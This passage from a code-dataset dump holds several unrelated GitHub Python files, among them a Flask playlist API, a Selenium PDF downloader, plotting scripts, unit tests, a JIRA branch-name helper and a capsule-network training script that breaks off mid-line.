test_run_population(self):\n run.run_population(self.init_pop, 5)\n\n def test_process_initial_org(self):\n rna = {'Organism Type': 'RNA'}\n bitstring = {'Organism Type': 'Bitstring', 'Length of Org': '5'}\n nk = {\n 'Organism Type': 'NK Model',\n 'Length of Org': '5',\n 'K-total': '3'}\n nk_genes = {\n 'Organism Type': 'NK Model',\n 'Length of Org': '6',\n 'Length of Gene': '2',\n 'K-total': '3',\n 'Number of Genes': '3',\n 'K-intra': 1}\n run.process_initial_org(rna)\n run.process_initial_org(bitstring)\n run.process_initial_org(nk)\n run.process_initial_org(nk_genes)\n\n with self.assertRaises(run.OrgException):\n run.process_initial_org({'Organism Type': 'Wrong'})\n\n def test_process_initial_population(self):\n single_pop = {\n 'Organism Type': 'Bitstring',\n 'Mutation Rate': '0.01',\n 'Length of Org': '5',\n 'Orgs per Population': '10'}\n meta_pops = {\n 'Number of Populations': '2',\n 'Migration Rate': '0.33',\n 'Proportion of Population Migrated': '1.0'}\n structured_pops = {\n 'Number of Subpopulations in Width': '3',\n 'Number of Subpopulations in Height': '4',\n 'Migration Type': 'Local'}\n meta_pops.update(single_pop)\n structured_pops.update(meta_pops)\n run.process_initial_population(single_pop)\n run.process_initial_population(meta_pops)\n run.process_initial_population(structured_pops)\n\n def test_process_and_run(self):\n settings = {\n 'Organism Type': 'Bitstring',\n 'Mutation Rate': '0.01',\n 'Length of Org': '5',\n 'Number of Populations': '1',\n 'Orgs per Population': '10',\n 'Number of Generations': '2',\n 'Output File Path': self.temp_file}\n run.process_and_run(settings)\n","repo_name":"jaredc-s/structure_and_landscapes","sub_path":"run_management/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"17524737846","text":"from tkinter.tix import Tree\nfrom flask import Flask, request\nfrom flask.json import jsonify\nfrom flask_cors import CORS\n\nfrom gestor import Gestor\nfrom xml.etree import ElementTree as ET\n\napp = Flask(__name__)\napp.config[\"DEBUG\"]=True\n\nCORS(app)\n#python manage.py runserver\ngestor=Gestor()\nidcancion=''\n@app.route('/')\ndef home():\n return \"TODO VA BIEN\"\n\n@app.route('/agregarCancion',methods=['POST'])\ndef agregarCancion():\n json=request.get_json()\n gestor.agregar_cancion(json['nombre'],json['artista'],json['genero'],json['anio'])\n return jsonify({'ok':True,'message':'Cancion añadida con exito'}),200\n\n@app.route('/agregarCanciones',methods=['POST'])\ndef agregarCanciones():\n xml=request.data.decode('utf-8')\n raiz=ET.XML(xml)\n for elemento in raiz:\n if elemento.tag == 'playlistClientes':\n for subelemento in elemento:\n if subelemento.tag == 'playlist': \n idplay=subelemento.get('id')\n for sub in subelemento:\n if sub.tag == 'nitCliente':\n nit =sub.text\n elif sub.tag == 'vinyl':\n vinyl = sub.text\n elif sub.tag == 'compacto':\n compacto = sub.text\n elif sub.tag == 'categoria':\n categoria = sub.text\n elif sub.tag == 'canciones':\n for sub1 in sub:\n if sub1.tag=='cancion':\n global idcancion\n idcancion=sub1.get('id')\n for sub2 in sub1:\n if sub2.tag=='nombre':\n nombre=sub2.text\n elif sub2.tag=='anio':\n anio = sub2.text\n elif sub2.tag=='artista':\n artista = sub2.text\n elif sub2.tag=='genero':\n genero = sub2.text\n gestor.agregar_cancion(nombre,anio,artista,genero)\n return jsonify({'ok':True,'message':'Canciones cargadas con exito'}),200\n\n@app.route('/canciones',methods=['GET'])\ndef get_canciones():\n c=gestor.obtener_canciones()\n return jsonify(c),200\n\n@app.route('/ayuda')\ndef ayuda():\n return \"aca aparece mi nombre\"\n\n@app.route('/eliminar', methods=['DELETE'])\ndef eliminar():\n xml_file = request.files['xml_file']\n song_id = request.form['song_id']\n\n # Parsea el archivo XML de la playlist\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n # Busca la canción con el ID especificado\n song = None\n for element in root.iter():\n if element.tag == 'cancion' and element.attrib['id'] == song_id:\n song = element\n break\n\n if song is not None:\n # Elimina la canción del árbol XML\n root.remove(song)\n\n # Graba el archivo XML de la playlist\n tree.write(xml_file)\n return 'Canción eliminada'\n \n\nif __name__ ==\"__main__\":\n app.run(debug=True)","repo_name":"Franciscoj04/IPC2_Proyecto2_202006716","sub_path":"Backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74781472465","text":"\"\"\"\nThe main file for this project. Consumes the raw data and produces an output file\ncalled \"summarized_data.csv\" containing the combined labels for the \n*first 10 columns only*\n\"\"\"\nimport pandas as pd\n\nID_COL = ['Input.attr_id']\nADJ_COLS = ['Input.adj_' + str(i) for i in range(1, 11)]\nANS_COLS = ['Answer.adj_' + str(i) for i in range(1, 11)]\n\ndef summarize_labels_baseline(data):\n \"\"\"\n Baseline approach. Predicts the label by plurality vote of all the labelers.\n \"\"\"\n cols = ID_COL + ADJ_COLS + ANS_COLS\n answers = [ # Group all of the entries that have a particular q/a combo\n data[cols].groupby(ID_COL + [ADJ_COLS[i]])[ANS_COLS[i]]\n .apply(list)\n .reset_index()\n # Rename so that we have consistent naming for each answer\n .rename(index=str, columns={'Input.attr_id': 'attr_id',\n ADJ_COLS[i]: 'adj', \n ANS_COLS[i]: 'label'})\n for i in range(len(ADJ_COLS))\n ]\n # Comine all of the answer-groupings into a single dataframe\n # Result is a dataframe where each row is a question-adjective pair, \n # and there's a column called 'label' that right now contains a list of \n # all of the labelers answers\n answers = pd.concat(answers, ignore_index=True)\n # We want to produce a single value for label. Say that the label is True\n # if at least half of labelers think it's true.\n answers['label'] = answers['label'].apply(lambda x: x.count('Yes') > len(x)/2)\n return answers\n\ndef summarize_labels(data):\n \"\"\"\n Your code goes here\n \"\"\"\n return answers\n\n\ndef main():\n\n data = pd.read_csv('raw_data.csv')\n\n # Once you have written your code, comment out this line\n result = summarize_labels_baseline(data)\n\n # Once you have written your code, uncomment this line\n #result = summarize_labels(data)\n\n # Save result\n output = pd.DataFrame(result, columns=['attr_id', 'adj', 'label'])\n output = output.sort_values(by=['attr_id', 'adj', 'label'])\n output.to_csv('summarized_data.csv', index=False)\n\nif __name__ == '__main__':\n main()","repo_name":"josh-tobin/labeling-challenge","sub_path":"summarize_labels.py","file_name":"summarize_labels.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"29938681588","text":"#-*- coding=utf-8 -*-\nimport os\nimport json\nimport sys\nimport shutil\nimport html\n\n\nfrom selenium import webdriver\n\nROOT,FILENAME=os.path.split(os.path.abspath(__file__))\nJavaScript=\"\"\nSAVEPATH=\"./\"\nUSERNAME=os.getenv(\"username\")\n\ndef LoadJs():\n global JavaScript\n if (not os.path.exists(ROOT+\"/JavaScript.js\")):\n print(\"JavaScript.js not found\")\n exit(1)\n try:\n f=open(ROOT+\"/JavaScript.js\",\"r\")\n JavaScript=f.read()\n except:\n print(\"Unknown error\")\n exit(1)\n\n\ndef checking(f):\n global USERNAME,SAVEPATH\n path=os.path.join(os.path.expanduser(\"~\"),\"Downloads\")\n if os.path.exists(path+\"/\"+f):\n print(\"download confirm\")\n print(f)\n if not os.path.exists(SAVEPATH):\n os.mkdir(SAVEPATH)\n # shutil.move(path+\"/\"+f,SAVEPATH+\"/\"+f)\n shutil.copyfile(path+\"/\"+f,SAVEPATH+\"/\"+f)\n os.remove(path+\"/\"+f)\n \ndef download(url,timeout=30):\n global JavaScript\n \n appState = { \n \"recentDestinations\": [ \n { \n \"id\": \"Save as PDF\", \n \"origin\": \"local\" \n } \n ], \n \"selectedDestinationId\": \"Save as PDF\", \n \"version\": 2\n } \n profile = {\n 'printing.print_preview_sticky_settings.appState': json.dumps(appState)\n } \n options=webdriver.ChromeOptions()\n options._binary_location=ROOT+\"/Application/chrome.exe\"\n options.add_experimental_option(\"prefs\",profile)\n options.add_argument(\"--disable-gpu\")\n options.add_argument('--allow-running-insecure-content')\n options.add_argument('--kiosk-printing')\n options.add_argument('--disable-extensions')\n #options.add_argument('--headless')\n \n chrome=webdriver.Chrome(chrome_options=options,executable_path=ROOT+\"/chromedriver.exe\")\n chrome.set_script_timeout(timeout)\n print(\"Geting url...\")\n try:\n chrome.get(url)\n filename=chrome.title\n except:\n print(\"Error on get url\")\n try:\n print(\"Execute JavaScript...\")\n chrome.execute_async_script(JavaScript)\n except:\n print(\"Error on execute JavaScript\")\n finally: \n chrome.quit()\n checking(filename+\".pdf\")\n\n\n\n \n \ndef main():\n global JavaScript,SAVEPATH\n \n LoadJs()\n try:\n # print(JavaScript)\n url=sys.argv[1]\n SAVEPATH=sys.argv[2]\n try:\n timeout=sys.argv[3]\n except:\n timeout=30\n # url=\"https://wenku.baidu.com/view/8952e6fb0c22590102029d8f.html?from=search\"\n # SAVEPATH=\"E:/workplace\"\n download(url,timeout)\n except:\n # print(\"usage: python \"+FILENAME+\" \")\n url=input(\"url:\")\n timeout=input(\"timeout:\")\n download(url,timeout)\n \n \n \n\nif __name__==\"__main__\":\n main()\n\n","repo_name":"needhourger/CQtestLib","sub_path":"BDWKdownload.py","file_name":"BDWKdownload.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25763285171","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('PEGI_Ratings_20170907.csv')\nsns.set()\n\ndf['year'] = df.release.str.slice(0, 4)\n\n# Graph by year\ngraph_df = df[['year', 'rating']].groupby('year', as_index=False).agg('mean')\n\np = sns.relplot(data = graph_df, x=\"year\", y=\"rating\", kind=\"line\", color=\"#391E29\")\np.set_ylabels(\"PEGI rating\")\np.set_xlabels(\"Year of release\")\np.set(ylim=(0, 11))\nplt.title(\"Average PEGI rating by year\")\n\nfig = plt.gcf()\nfig.set_size_inches(12, 4)\nfig.savefig('plot_year.png', dpi=100, bbox_inches='tight')\n\n# Graph by genre\ngraph_df = df[['genre', 'rating']].groupby('genre', as_index=False).agg('mean')\n\np = sns.catplot(data = graph_df, x=\"rating\", y=\"genre\", kind=\"bar\", color=\"#36554B\")\np.set_xlabels(\"PEGI rating\")\np.set_ylabels(\"Game genre\")\np.set(xlim=(0, 13))\nplt.title(\"Average PEGI rating by game genre (1999-2017)\")\n\nfig = plt.gcf()\nfig.set_size_inches(12, 5)\nfig.savefig('plot_genre.png', dpi=100, bbox_inches='tight')\n\n# Graph by platform\ngraph_df = df[['platform', 'rating']].groupby('platform', as_index=False).agg('mean')\n\np = sns.catplot(data = graph_df, x=\"rating\", y=\"platform\", kind=\"bar\", color=\"#853C43\")\np.set_xlabels(\"PEGI rating\")\np.set_ylabels(\"\")\np.set(xlim=(0, 13))\nplt.title(\"Average PEGI rating by game platform (1999-2017)\")\n\nfig = plt.gcf()\nfig.set_size_inches(12, 12)\nfig.savefig('plot_platform.png', dpi=100, bbox_inches='tight')\n\n","repo_name":"edomt/pegi","sub_path":"make_graphs.py","file_name":"make_graphs.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"34737480190","text":"import glob\nfrom netCDF4 import Dataset\nfrom csIO import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom kazrRet import *\nimport lidarSim as lidSim\nfs=sorted(glob.glob(\"anvData/cs*nc\"))\niwp1L=[]\niwp2L=[]\nfor f in fs:\n fh=Dataset(f)\n iwp=fh[\"iwp\"][:]\n zw=fh[\"zw\"][:]\n iwc=fh[\"iwc\"][:]\n Dm=fh[\"re\"][:]*3.75e-3\n for i,zw1 in enumerate(zw):\n if zw1.max()<0:\n continue\n a=np.nonzero(zw1>-25)\n iwc1d=np.zeros((40),float)\n for k,zw11 in enumerate(zw1[a]):\n ifind = lidSim.bisection2(dmST[0,:],Dm[i,a[0][k]])\n dnw=(zw11-zST[2,ifind])/10.0\n iwc1d[k]=iwcST[2,ifind]*10**dnw\n iwp1L.append(iwc1d.sum())\n iwp2L.append(iwp[i])\n\n break\n","repo_name":"mgrecu35/anvilRetr","sub_path":"CloudSat/readAnvData.py","file_name":"readAnvData.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13012211668","text":"#2 반 평균을 구하시오.\nscores = {\n \"철수\" : {\n \"수학\" : 80,\n \"국어\" : 90,\n \"음악\" : 100\n },\n \"영희\" : {\n \"수학\" : 70,\n \"국어\" : 60,\n \"음악\" : 50\n }\n}\n\n#방법1) 내가 푼 방법\n# total_score = 0\n# for class_name in scores:\n# for score in scores[class_name].values():\n# total_score += score\n# average_score = total_score / len(scores[class_name])\n# average_class = average_score / len(scores)\n# print(average_class)\n\n#방법2) 선생님께서 푸신 방법\n# total_score = 0\n# for person_score in scores.values():\n# for indivisual_score in person_score.values():\n# total_score += indivisual_score\n# count += 1\n\n# average_score = total_score / count\n# print(average_score)\n\n# for key, value in scores.items():\n# print(key)\n# print(value)\n\n\n# 3 도시 중 최근 3일 중에 가장 추웠던 곳, 가장 더웠던 곳은?\ncities = {\n \"서울\" : [-6 -10, -5],\n \"대전\" : [-3 -5, -2],\n \"광주\" : [0 -2, 10],\n \"부산\" : [2 -2, 9]\n}\n#max min\n\nfor key, value in cities.items():\n print(key)\n print(value)\n\n# for name in cities:\n# for temp in cities.values():\n# temp_min = min(list(cities.values())\n# # temp_max = max(list(cities.values())","repo_name":"hongyong3/TIL","sub_path":"python/practice/dictionary/dict_practice2.py","file_name":"dict_practice2.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42298669525","text":"# Distributed under the MIT License.\n# See LICENSE.txt for details.\n\nimport os\nimport shutil\nimport unittest\n\nfrom click.testing import CliRunner\n\nfrom spectre.Domain.Creators import Cylinder\nfrom spectre.Informer import unit_test_build_path, unit_test_src_path\nfrom spectre.Visualization.PlotPowerMonitors import (\n find_block_or_group,\n plot_power_monitors_command,\n)\n\n\nclass TestPlotPowerMonitors(unittest.TestCase):\n def setUp(self):\n self.test_dir = os.path.join(\n unit_test_build_path(), \"Visualization\", \"PlotPowerMonitors\"\n )\n os.makedirs(self.test_dir, exist_ok=True)\n self.h5_filename = os.path.join(\n unit_test_src_path(), \"Visualization/Python\", \"VolTestData0.h5\"\n )\n self.plot_filename = os.path.join(self.test_dir, \"plot.pdf\")\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_find_block_or_group(self):\n domain = Cylinder(\n inner_radius=1.0,\n outer_radius=3.0,\n lower_bound=0.0,\n upper_bound=2.0,\n is_periodic_in_z=False,\n initial_refinement=1,\n initial_number_of_grid_points=[3, 4, 5],\n use_equiangular_map=True,\n ).create_domain()\n self.assertEqual(\n find_block_or_group(0, [\"BlockyBlock\", \"InnerCube\"], domain), 1\n )\n self.assertEqual(\n find_block_or_group(1, [\"BlockyBlock\", \"InnerCube\"], domain), None\n )\n self.assertEqual(\n find_block_or_group(1, [\"InnerCube\", \"Wedges\"], domain), 1\n )\n\n def test_cli(self):\n runner = CliRunner()\n # Test plotting a single step\n result = runner.invoke(\n plot_power_monitors_command,\n [\n self.h5_filename,\n \"-d\",\n \"element_data\",\n \"--step\",\n \"-1\",\n \"-b\",\n \"Brick\",\n \"-e\",\n \"B*\",\n \"-y\",\n \"Psi\",\n \"-o\",\n self.plot_filename,\n ],\n catch_exceptions=False,\n )\n self.assertEqual(result.exit_code, 0, result.output)\n # Can't easily test the plot itself, so just check that it was created\n self.assertTrue(os.path.exists(self.plot_filename))\n os.remove(self.plot_filename)\n\n # Test plotting over time\n result = runner.invoke(\n plot_power_monitors_command,\n [\n self.h5_filename,\n \"-d\",\n \"element_data\",\n \"-b\",\n \"Brick\",\n \"-e\",\n \"B*\",\n \"-y\",\n \"Psi\",\n \"-o\",\n self.plot_filename,\n ],\n catch_exceptions=False,\n )\n self.assertEqual(result.exit_code, 0, result.output)\n # Can't easily test the plot itself, so just check that it was created\n self.assertTrue(os.path.exists(self.plot_filename))\n os.remove(self.plot_filename)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","repo_name":"sxs-collaboration/spectre","sub_path":"tests/Unit/Visualization/Python/Test_PlotPowerMonitors.py","file_name":"Test_PlotPowerMonitors.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"48"} +{"seq_id":"1015172124","text":"import time\n#\nfrom Inc.Param import TDictParam\nfrom Inc.Log import Log\nfrom Core.Device import TControl\n\n\nPkgConf = {\n \"Version\": \"1.01\",\n \"Author\": \"Vladvons\"\n}\n\nclass TControlSleep(TControl):\n def __init__(self, aParent):\n super().__init__(aParent)\n\n Pattern = {'Time': 1, 'Init': False}\n self.Param.AddDefPattern(Pattern)\n\n def DoParameter(self, aParam):\n self.Param.LoadPattern(aParam)\n\n def _Set(self, aCaller, aValue):\n #Log.PrintDbg(1, 'i', 'Alias %s' % (self.Alias))\n time.sleep(self.Param.Time)\n","repo_name":"VladVons/py-relay","sub_path":"src/Plugin/Devices/Sleep.py","file_name":"Sleep.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71764896786","text":"from src.components.data_ingesion import InitiateDataIngesion\nfrom src.components.chart_generator import InitiateChartGenerator\nfrom src.utils import data_columns, download, developer\nimport streamlit as st\nimport warnings\nwarnings.simplefilter('ignore')\n\n_, columns, reverse_columns = data_columns()\nwith st.sidebar:\n my_bar = st.radio('', options=('Home', 'Sales Trend', 'Uni variate Analysis', 'Bi variate Analysis', 'Developer'))\n\n# Dashboard\nif my_bar == 'Home':\n st.subheader(':blue[___________________________________________________]')\n st.title(':blue[Amazon Sales]')\n st.subheader(':blue[___________________________________________________]')\n st.caption('New sales data entry')\n raw_data = InitiateDataIngesion().get_data(data_from='local_raw_data')\n new_data = InitiateDataIngesion().single_data_entry(old_data=raw_data)\n tab1, tab2, tab3 = st.tabs(['Upload CSV', 'Download CSV', 'Data Viewer'])\n with tab1:\n InitiateDataIngesion().mulltiple_entry(old_data=raw_data)\n with tab2:\n download(raw_data)\n with tab3:\n st.dataframe(raw_data)\n # st.caption('Top Products')\n # InitiateChartGenerator().word_cloud()\n # InitiateChartGenerator().top_products()\n\n# Trend selection and distribution chart generator uses generate_trend_chart class\nif my_bar == 'Sales Trend':\n try:\n st.subheader(':blue[______________________________________________________]')\n st.title(':blue[Sales Trend]')\n st.subheader(':blue[______________________________________________________]')\n col1, col2, col3 = st.columns(3)\n with col1:\n trend_selection = st.radio(\n ':blue[Chart Combination]', (\n 'Monthly total', 'Yearly total', 'Yearly month wise bar chart', 'Yearly month wise line chart',\n 'Monthly Year wise'\n )\n )\n with col2:\n feature = st.radio(\n ':blue[Select Parameter]', columns)\n with col3:\n counter = st.radio(':blue[Select Total of]', ['Total', 'Average', 'Maximum', 'Minimum'])\n\n st.caption('Hover on image and click extend for full size')\n chart_fig = InitiateChartGenerator().generate_trend_chart(trend_selection, feature, counter)\n except:\n pass\n\n# Selection of one of the column and plot distribution uses univariate_plot class\nif my_bar == 'Uni variate Analysis':\n st.subheader(':blue[______________________________________________________]')\n st.title(':blue[Uni variate Analysis]')\n st.subheader(':blue[______________________________________________________]')\n selected = st.selectbox(':blue[Select the parameter to generate data distribution plot]', columns)\n st.caption('Hover on image and click extend for full size')\n InitiateChartGenerator().univariate_plot(selected)\n\n# Select two column to compare\nif my_bar == 'Bi variate Analysis':\n st.subheader(':blue[______________________________________________________]')\n st.title(':blue[Bi variate Analysis]')\n st.subheader(':blue[______________________________________________________]')\n st.subheader(':blue[Comparison of sales amounts yearly month wise: -]')\n col1, col2 = st.columns(2)\n with col1:\n option1 = st.radio('Select First element', columns)\n with col2:\n option2 = st.radio('Select second element', reverse_columns)\n InitiateChartGenerator().bivariate_plot(option1, option2)\n\nif my_bar == 'Developer':\n developer()\n","repo_name":"Ranjitdev/amazon_sales","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10481120872","text":"import googletrans\nimport os\nimport requests\nimport sys\nfrom typing import Iterable, List, Optional\n\nfrom jira import JIRA, Issue, JIRAError\n\nJIRA_USER = os.environ.get(\"JIRA_USER\")\nJIRA_PASSWORD = os.environ.get(\"JIRA_PASSWORD\")\nJIRA_OPTIONS = {\"server\": os.environ.get(\"JIRA_BASE\")}\n\ntranslator = googletrans.Translator()\n\n\ndef varify_ticket_format(ticket_no):\n if not ticket_no or ticket_no == '':\n return False\n tmp = ticket_no.split('-')\n if len(tmp) != 2:\n return False\n project, number = tmp[0], tmp[1]\n if project == '' or number == '' or not number.isnumeric() or \\\n int(number) == 0 or not project.isalpha():\n return False\n return True\n\n\ndef branchname_maker(ticket_no, msg):\n if not msg or msg == '':\n raise Error\n change_list = [\n (' ', '-'),\n ('_', '-'),\n (':', '-'),\n (\"'\", '\"'),\n ('/', ''),\n ('(', ''),\n (')', ''),\n ('[', ''),\n (']', ''),\n ('{', ''),\n ('}', '')\n ]\n for change_from, change_to in change_list:\n msg = msg.replace(change_from, change_to)\n return (ticket_no + '-' + msg).lower()\n\n\ndef get_jira_client() -> JIRA:\n return JIRA(basic_auth=(JIRA_USER, JIRA_PASSWORD), **JIRA_OPTIONS)\n\n\ndef get_issues(keys: Iterable[str], jira_client: Optional[JIRA] = None) -> List[Issue]:\n jira_client = jira_client or get_jira_client()\n return jira_client.search_issues(f\"key in ({','.join(str(key) for key in keys)})\")\n\n\ndef get_issue(key: str, jira_client: Optional[JIRA] = None) -> Issue:\n jira_client = jira_client or get_jira_client()\n return jira_client.issue(key)\n\n\ndef make_names(ticket_no_list: List[str]):\n issues = get_issues(ticket_no_list)\n for issue in issues:\n ticket_no = issue.key\n summary_origin = issue.fields.summary\n summary_trans = translator.translate(summary_origin, dest='en')\n suggested_name = branchname_maker(ticket_no, summary_trans.text)\n print(f\"{ticket_no}\\n\\t- origin:\\t\\\"{summary_origin}\\\"\\n\\t- result:\\t\\\"{suggested_name}\\\"\")\n\n\ndef make_name(ticket_no: str):\n issue = get_issue(ticket_no)\n summary_origin = issue.fields.summary\n summary_trans = translator.translate(summary_origin, dest='en')\n suggested_name = branchname_maker(ticket_no, summary_trans.text)\n\n answer = input(f\"suggested name is: \\\"{suggested_name}\\\". copy this? (y/n): \")\n if answer.upper() in ('Y', 'YES', '네', '넵', '넹', 'DD', '', 'D'):\n os.system(f\"echo '{suggested_name}' | pbcopy\")\n print(\"copied!\")\n else:\n print(\"bye\")\n\n\ndef main(argv):\n if len(argv) == 1:\n make_name(argv[0])\n else:\n make_names(argv)\n\n\nif __name__ == \"__main__\":\n argc = len(sys.argv)\n if argc <= 1:\n sys.stderr.write(\"[ERROR] At least 1 argument needed: ticket number\\n\")\n exit(-1)\n for i in range(1, argc):\n if not varify_ticket_format(sys.argv[i]):\n sys.stderr.write(f\"[ERROR] Ticket format error : {sys.argv[i]}\\n\")\n exit(-1)\n main(sys.argv[1:])\n","repo_name":"hyunwook-kim-dhk/branch_name_maker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26737745743","text":"###########################\n# Capsule Network Main.py #\n###########################\n\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport numpy as np\nfrom termcolor import colored, cprint\nimport time, os, sys, scipy\nsys.path.append('../')\n# User\nfrom core.data_utils import load_specific_noisy_data, load_random_noisy_data, DATA, Dimension, compare_weight_similarity\nimport core.data_utils as du\nfrom core.args import parameter_print, args\nfrom core.analysis import Analysis, TSNE_\nfrom capsulenet import CapsNet_WithDecoder, margin_loss, CapsNet_NoDecoder, wieght_similarity\nfrom core.data_utils import load_specific_noisy_data\n# keras\nfrom keras.utils import multi_gpu_model\nfrom keras import callbacks, layers, optimizers\nfrom keras import backend as K\n\nnoise_list = ['doing_the_dishes_SNR5','dude_miaowing_SNR5','exercise_bike_SNR5','pink_noise_SNR5','running_tap_SNR5','white_noise_SNR5']\ndef train(multi_model, data, save_path, args):\n trX, trY, vaX, vaY = data\n print(str(trX.shape),str(trY.shape),str(vaX.shape),str(vaY.shape))\n \n multi_model.compile(optimizer=optimizers.Adam(lr=args.learning_rate),\n loss=[margin_loss, 'mse'],\n loss_weights=[1., args.lam_recon],\n metrics=['accuracy']) \n # callbacks\n log = callbacks.CSVLogger(save_path + '/log.csv')\n checkpoint = callbacks.ModelCheckpoint(save_path + '/weights-{epoch:03d}.h5py', monitor='val_capsnet_acc',\n save_best_only=True, save_weights_only=True, verbose=1)\n earlystop = callbacks.EarlyStopping(monitor='val_decoder_acc', min_delta=0, patience=10, verbose=1, mode='auto')\n #lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.learning_rate * (0.9 ** args.num_epoch))\n #tb = callbacks.TensorBoard(log_dir=save_path + '/tensorboard-logs',\n # batch_size=args.batch_size, histogram_freq=args.debug)\n\n multi_model.fit([trX, trY],[trY,trX],\n batch_size=args.batch_size, epochs=args.num_epoch,\n #validation_split = 0.1,\n validation_data=[[vaX,vaY],[vaY,vaX]], \n shuffle = True,\n callbacks=[log, checkpoint, earlystop])\n \n\ndef train_NoDecoder(multi_model, data, save_path, args):\n trX, trY, vaX, vaY = data\n print(str(trX.shape),str(trY.shape),str(vaX.shape),str(vaY.shape))\n \n if args.ex_name == 'best':\n multi_model.compile(optimizer=optimizers.SGD(lr=args.learning_rate),\n loss=[margin_loss],\n metrics=['accuracy']) \n else: \n multi_model.compile(optimizer=optimizers.Adam(lr=args.learning_rate),\n loss=[margin_loss],\n metrics=['accuracy']) \n # callbacks\n log = callbacks.CSVLogger(save_path + '/log.csv')\n checkpoint = callbacks.ModelCheckpoint(save_path + '/weights-{epoch:03d}.h5py', monitor='val_acc',\n save_best_only=True, save_weights_only=True, verbose=1)\n earlystop = callbacks.EarlyStopping(monitor='val_acc', min_delta=0, patience=10, verbose=1, mode='auto')\n #tb = callbacks.TensorBoard(log_dir=save_path + '/tensorboard-logs',\n # batch_size=args.batch_size, histogram_freq=args.debug)\n #lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.learning_rate * (0.9 ** args.num_epoch))\n\n multi_model.fit(trX, trY,\n batch_size=args.batch_size, epochs=args.num_epoch,\n #validation_split = 0.1,\n validation_data=[vaX,vaY], \n shuffle = True,\n callbacks=[log, checkpoint, earlystop])\n\n\ndef test(model, data, args):\n start_time = time.time()\n teX,teY = data\n print('-'*20 + 'Begin: test with ' + '-'*20)\n y_pred = md.predict(teX,batch_size=args.batch_size)\n\n # Weight_similarity\n if args.weight_similarity:\n print(y_pred.shape)\n Array1,Array2, Sim = du.compare_weight_similarity(teY,y_pred,label1=0,label2=24,label3=25,plot=args.wsplot)\n cprint(Sim,'blue')\n\n # Test with 30 labels\n label30_acc = float(np.sum(np.argmax(y_pred, 1) == np.argmax(teY, 1)))/float(teY.shape[0])\n print('Test with 30 labels acc:', label30_acc )\n A = np.argmax(y_pred, 1)\n B = np.argmax(teY, 1)\n assert A.shape[0] == B.shape[0]\n du.pick_mis_recognized(B,A,label2=24,label3=25)\n \n # Test with 21 labels\n sub_label = [0,1,2,3,9,10,12,20,24,27]\n for i in range(A.shape[0]):\n if A[i] in sub_label: A[i] = 0\n if B[i] in sub_label: B[i] = 0\n label21_acc = float(np.sum(A == B))/float(teY.shape[0])\n end_time = time.time()\n print('Test with 21 labels acc:', label21_acc)\n \n # Test with 10 labels\n sub_label = [0,1,2,3,5,6,7,9,10,12,13,17,19,20,21,23,24,25,27,29]\n for i in range(A.shape[0]):\n if A[i] in sub_label: A[i] = 0\n if B[i] in sub_label: B[i] = 0\n label10_acc = float(np.sum(A == B))/float(teY.shape[0])\n print('Test with 10 labels acc:' + str(label10_acc))\n print('Time: ' + str(end_time-start_time))\n print('-'*20 + 'End: test' + '-'*20)\n return label30_acc, label21_acc\n\n\nif __name__ == \"__main__\":\n args = args()\n ex_name = args.ex_name+'_'+args.train_with+'_'+args.test_with\n parameter_print(args,ex_name=ex_name,ModelType=\"CapsuleNet\")\n save_path = os.path.join(args.project_path,'save',args.model,ex_name)\n cprint('save_path: '+str(save_path),'yellow')\n if args.is_training == 'TEST' and args.SNR == None:\n raise ValueError('For TEST you should set SNR')\n\n # Data load\n data = DATA(args.is_training, args.train_with, args.test_with,\n args.data_path, feature_len=args.feature_len, mode=args.mode,dimension=args.dimension) #[sample,99,40,3]\n X,Y = data[0],data[1]\n\n # Define Model\n cprint(str(len(np.unique(np.argmax(Y, 1)))), 'red')\n with tf.device('/cpu:0'):\n if args.decoder == 1:\n model, eval_model, manipulate_model = CapsNet_WithDecoder(input_shape=X.shape[1:],\n n_class=len(np.unique(np.argmax(Y, 1))),\n kernel=args.kernel,\n primary_channel=args.primary_channel,\n primary_veclen=args.primary_veclen,\n digit_veclen = args.digit_veclen,\n dropout = args.dropout,\n routings=args.routings,\n decoderParm=(args.NumDecoderLayer,\n [args.DecoderLayer1,args.DecoderLayer2,args.DecoderLayer3]\n ),\n model_size_info=args.model_size_info)\n else:\n model = CapsNet_NoDecoder(input_shape=X.shape[1:],\n n_class=len(np.unique(np.argmax(Y, 1))),\n kernel=args.kernel,\n primary_channel=args.primary_channel,\n primary_veclen=args.primary_veclen,\n digit_veclen = args.digit_veclen,\n dropout = 